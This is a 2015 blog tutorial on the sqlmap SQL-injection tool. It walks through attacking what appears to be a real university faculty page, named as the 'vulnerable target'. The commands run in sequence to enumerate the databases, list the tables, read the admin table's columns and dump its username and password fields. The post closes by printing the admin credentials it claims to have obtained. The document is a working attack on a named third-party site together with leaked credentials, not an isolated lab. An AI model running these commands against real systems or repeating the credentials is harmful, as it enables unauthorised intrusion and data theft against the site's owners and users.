Wednesday, January 21, 2015

SQLmap Step By Step Tutorial

SQLmap Step By Step Tutorial

Today we will see the step-by-step tutorial of Sqlmap.
Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Sqlmap is is best sql injection tool.

With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database.
It is totally a database takeover tool

Steps:

1.First we require the vulnerable target and here it is

http://www.hu.edu.pk/viewfaculty.php?id=12

2.Go to Backtrack and type cd /pentest/database/sqlmap




3.Run the sqlmap

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url



./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db




if you write as --dbs then it will fetch all the databases in the server

and if you write --current-db then it will fetch only the database related to the current website

we will get the database name

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables



Here after -D we have to give the database name

--tables means we are trying to fetch the tables in the current database

and we will get the table names



after that we have to fetch only the table information which we required

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

we will get the names of columns in that table with datatype





./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump



now we will get the total information in the table "admin"






After finishing all the process you r having




Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123